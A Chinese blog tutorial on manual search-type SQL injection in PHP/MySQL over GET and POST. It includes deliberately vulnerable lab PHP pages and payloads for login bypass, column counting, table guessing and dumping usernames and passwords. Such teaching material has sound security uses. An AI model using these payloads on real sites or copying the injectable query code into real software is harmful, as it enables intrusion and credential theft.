SQL注入系列之PHP+Mysql手动注入(三)----搜索型(POST/GET)

最新推荐文章于 2024-06-18 11:01:11 发布
最新推荐文章于 2024-06-18 11:01:11 发布
阅读量1.8k 收藏 4
点赞数 2
分类专栏: Sqlmap

一、搜索型注入简介与原理

1)简介

一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在:

其中又分为POST/GET,GET型的一般是用在网站上的搜索,而POST则用在用户名的登录,可以从form表单的method="get"属性来区分是get还是post。搜索型注入又称为文本框注入

2)原理

[html]  view plain  copy
  1. $sql="select * from user where password like '%$pwd%' order by password";  

这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。但是如果有人输入这样的内容呢?

[html] view plain copy

  1. 'and 1=1 and '%'='  

这样的话这句SQL语句就变成了这样
html] view plain copy

  1. select * from user where password like '%fendo'and 1=1 and '%'='%' order by password  

存在SQL注入。

二、搜索型注入判断

判断搜索型注入的方法:

1 搜索keywords‘,如果出错的话,有90%的可能性存在漏洞;
2 搜索 keywords%,如果同样出错的话,就有95%的可能性存在漏洞;
3 搜索keywords% 'and 1=1 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=1)看返回的情况
4 搜索keywords% 'and 1=2 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=2)看返回的情况
5 根据两次的返回情况来判断是不是搜索型文本框注入了

下面这几种语句都可以:

'and 1=1 and '%'='

%' and 1=1--'

%' and 1=1 and '%'='



三、搜索型注入实战

1)GET型注入

测试源码:

[html]  view plain  copy
  1. <?  
  2. $pwd=$_GET['pwd'];  
  3. $conn=mysql_connect("127.0.0.1","root","123");//连接mysql数据库  
  4. if($conn){  
  5.     echo "连接数据库成功!";   
  6. }//判断连接是否成功  
  7. echo "<br>";  
  8. mysql_select_db('fendo',$conn);//选择连接请求为conn的数据库(fendo)  
  9. $sql="select * from user where password like '%$pwd%' order by password"; //字符型搜索语句  
  10. $result=mysql_query($sql);  
  11. while($row = mysql_fetch_array($result)){   
  12.     echo "用户ID:".$row['id']."<br >";  
  13.     echo "用户名:".$row['username']."<br >";  
  14.     echo "用户密码:".$row['password']."<br >";  
  15.     echo "用户邮箱:".$row['email']."<br >";  
  16. }  
  17. mysql_close($conn); //关闭数据库连接  
  18. echo "<hr>";  
  19. echo "你当前执行的sql语句为:"."<br >";  
  20. echo $sql;  
  21. ?>  


1.判断字段数

语句:

[html]  view plain  copy
  1. %' union select 1,2,3,4,...... and '%'='  


还有种方法

语句:


[html]  view plain  copy
  1. <span style="font-size:18px;">%' and exists (select id from user where LENGTH(username)<6 and id=1) and '%'='   
  2. </span>  

把6这个数字逐次更换,直到他不报错为止。如下当它小于6时正确,说明字段数为5。




2.判断表名

语句:

[html]  view plain  copy
  1. %'and(select count(*)from admin)>0 and '%'='  

把admin这个表名逐次更换,直到他不报错为止,就说明这个表存在。

3.猜解密码

由于这里用的就是密码,所以这里换成猜解用户名


2)POST型注入

测试源码

[html] view plain copy

  1. <?  
  2. //--------------------------post处理--------------------------------//  
  3. $name=addslashes($_POST['n']);   
  4. $pass=addslashes($_POST['p']);  
  5. $conn = mysql_connect('127.0.0.1','root','123');   
  6. if($conn){  
  7.     echo "mysql连接成功";  
  8.     echo "<hr>";    
  9. }  
  10. mysql_select_db('fendo',$conn);    
  11. $sql="select * from user where username='$name' and password='$pass'";  
  12. $result=mysql_query($sql);  
  13. mysql_close($conn);  
  14. while($row = mysql_fetch_array($result)){  
  15.     echo "用户ID:".$row['id']."<br >";  
  16.     echo "用户名:".$row['username']."<br >";  
  17.     echo "用户密码:".$row['password']."<br >";  
  18. }  
  19. echo "当前执行的sql语句:".$sql;  
  20. ?>  
  21.   
  22. <form action="" method="POST">  
  23. 账号:<input name="n" type="text" /><br><br>  
  24. 密码:<input name="p" type="text" /><br><br>  
  25. <input name="" type="submit" value="提交" />  
  26.   
  27. </form>  



1.判断是否存在SQL注入

用PHP万能密码进行测试

[html]  view plain  copy
  1. ' or 1=1#  
在用户名里输入万能密码如果没报错,就说明存在SQL注入。




2.猜字段数

[html]  view plain  copy
  1. ' order by 4#  

逐次更改数字去猜,直到不报错为止。

3.猜表名

[html]  view plain  copy
  1. 'or 1=1 union select 1,2,3,4 #  

逐次累加数字,直到不报错为止。



4.猜内容

替换1,2,3为你想要获得的内容

[html]  view plain  copy
  1. 'or 1=1 union select username,password,3,4 from user#   

lixue20141529
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL注入搜索注入
qxx5203的博客
07-22 2612
SQL语句selectusername,idfromadminwhereusernamelike'%$name%'"%"匹配任何字符,"like"的意思就是像,"$"变量。正常回显,却无法判断字段数,也无法查看报错位。数据库表的信息(blog,heroes,movies,进入靶场后出现此界面,在登录界面输入。8页面显示不正常,发现最大正常位是。数据库列的信息id,num,判断一下是数字还是字符。账号密码错误或用户未注册!搜索框内输入a正常回显。...
SQL注入(二):字符+搜索+ XX+insert/update
NSQ0207的博客
07-19 384
1、使用 ' 进行测试2、使用order by 测试有几个字段3、使用union select 1,2 查看字段。
Web安全基础学习:SQL注入漏洞之PostgreSql注入
最新发布
qq_51862722的博客
06-18 1084
SQL注入SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
关于sql注入这一篇就够了(适合入门)
qq_53105813的博客
01-07 4938
sql注入详解
pikachu之特殊注入搜索注入、xx注入、insert/update注入、delete注入、宽字节注入
2301_80661529的博客
03-02 1262
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节。
SQL注入搜索盲注(手工注入
qxx5203的博客
07-22 1196
看看有没有注入点,页面异常。也尝试了其他手工注入的方法,仍然异常。判断一下是数字还是字符,页面异常。6页面显示不正常,发现最大正常位是5。,我们在搜索框中发现注入点。搜索框内输入a正常回显。进入靶场后出现此界面,在。用户名输入1’,密码任意。数据库列的信息id,...
PHP+MysqlSQL注入源码 下载
03-21
这个资源“PHP+MysqlSQL注入源码 下载”提供了一个带有SQL注入漏洞的实际示例,这让我们有机会深入理解这一常见安全问题,并学习如何预防和修复它。 首先,我们需要了解SQL(结构化查询语言)注入的基本概念。...
rest-api-using-php-mysql:使用PHPMySQL的简单REST API
05-13
在本文中,我们将深入探讨如何使用PHPMySQL创建一个简单的REST API。REST(Representational State Transfer)是一种架构风格,常用于构建Web服务,允许客户端和服务器之间进行数据交互。RESTful API遵循一组特定...
restapi-jwt-php-mysql
02-06
MySQL是一种关系数据库,能有效地管理和处理大量数据。在实现 JWT 身份验证时,数据库通常会包含用户表,其中存储用户名、密码哈希等信息。 JWT 的实现涉及到几个关键步骤: 1. 用户登录时,服务器验证其凭据(如...
sqlmap中文手册-sql注入自动化测试工具
07-19
在实际使用中,如果发现Web页面的参数(如GET、POST或Cookie)可能受到SQL注入的影响,SQLMap可以快速进行验证。例如,通过对URL中的参数进行测试,如`id=1 AND 1=1`和`id=1 AND 1=2`,如果两个请求返回不同的结果,...
PHP-MySQL-CRUD-Web-Application:使用面向对象PHPPHP MySQL CRUD操作示例
05-22
为了防止SQL注入攻击,应使用预处理语句来执行SQL操作。预处理语句将用户输入与SQL命令分开,提高安全性。 7. **错误处理和异常处理**: 应用程序应具备良好的错误处理机制,捕获可能出现的异常,如数据库连接...
SQL注入原理-字符注入
T1ngSh0w的博客
09-13 8990
SQL注入原理-字符注入
SQL注入:数字、字符搜索
qq_38719025的博客
03-11 5611
一、注入点的判断 对连接[http://10.0.0.26:8080/Less-2/?id=1]是否是注入点进行判断。 1、变换id 参数 当我们变换id 参数(2+1|2-1)的时候,发现同一个页面,页面展现出不同的内容。也就是说,数据库中的内容会回显到网页中来。 初步判定,id 参数会带入数据库查询,根据不同的id 查询数据库,得到不同的内容。 猜测后台执行的SQL 语句大致结构为: select * fro...
sql注入-不同数据类注入
xiaoheizi的博客
06-28 316
原因是程序员为了防止SQL注入,就会调用几种转义函数,将单引号或双引号进行转义操作,转义无非便是在单或双引号前加上斜杠(\)进行转义 ,但这样并非安全,因为数据库使用的是宽字节编码,两个连在一起的字符会被当做是一个汉字,而在PHP使用的UTF8编码则认为是两个独立的字符,如果我们在单或双引号前添加一个字符,使其和斜杠(\)组合被当作一个汉字,从而保留单或双引号,使其发挥应有的作用。可以发现就算闭合了【''】依然无法注入成功,是因为我们输入的【'】被在前加上斜杠(\)进行了转义,无法发挥作用。
记一次搜索注入
super_m@n的博客
01-09 574
1.起因 还是和往常一样,看见index.php?id=1这样的界面顺手就想来个and 1=1 ,结果没反应,试试其他的大小写 内联注释 多次编码注入均失败,我望着页面的无效参数陷入了深思,难道这个网站真的没有一丝可以利用的地方,我告诉自己不可能,肯定是自己能力不够还不足以发现页面的漏洞,既然sql不行那就找找xss csrf等漏洞,皇天不负有心人,在搜索框输入"><img src=...
DFX 安全测试-- 告诉你什么是XSS、sql注入POST和GET的区别....
a64910807的博客
02-25 969
1、用户权限测试  (1) 用户权限控制   1) 用户权限控制主要是对一些有权限控制的功能进行验证   2) 用户A才能进行的操作,B是否能够进行操作(可通过窜session,将在下面介绍)   3)只能有A条件的用户才能查看的页面,是否B能够查看(可直接敲URL访问)   (2) 页面权限控制   1) 必须有登陆权限的页面,是否能够在不登陆情况下进行访问   2)...
WEB安全之常见漏洞篇之SQL注入(基础 原理篇)
One-Fox安全团队的博客
04-14 462
盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。
mysql搜索注入_pikachu-搜索注入 #手工注入
weixin_28745525的博客
02-28 335
1.搜索注入漏洞产生的原因:在搭建网站的时候为了方便用户搜索该网站中的资源,程序员在写网站脚本的时候加入了搜索功能,但是忽略了对搜索变量的过滤,造成了搜索注入漏洞,又称文本框注入。2.搜索注入的类:同其他注入相同,由于提交表单的不同,可分为GET(多出现于网站上的搜索)和POST(多出现于用户名的登录搜索匹配),搜索注入是国内系统中普遍存在的漏洞。3.原理分析:select us...
Pikachu搜索注入
xdjxi的博客
03-07 845
一、原理 “%”匹配任何字符,“like”的意思就是像,这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。 构造对应的闭合,闭合前面的单引号和百分号,注释后面的百分号和单引号。构造的payload如下 xxxx%’ or 1=1# 二、操作 打开进入界面: 然后我们可以输入’ and 1=1 order by x#通过order by x来确定字段数,时返回了正常页面然后我们可以输入’ and 1...
搭建RHEL-7 SQLi-Labs平台,实践SQL注入练习
SQLi-Labs是一个专业的SQL注入练习平台,可用于GET和POST场景,其中包括多种类注入漏洞。 首先,SQLi-Labs提供了基于错误的注入(Union Select)和基于误差的注入(双查询注入)等注入漏洞练习。这些练习旨在...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值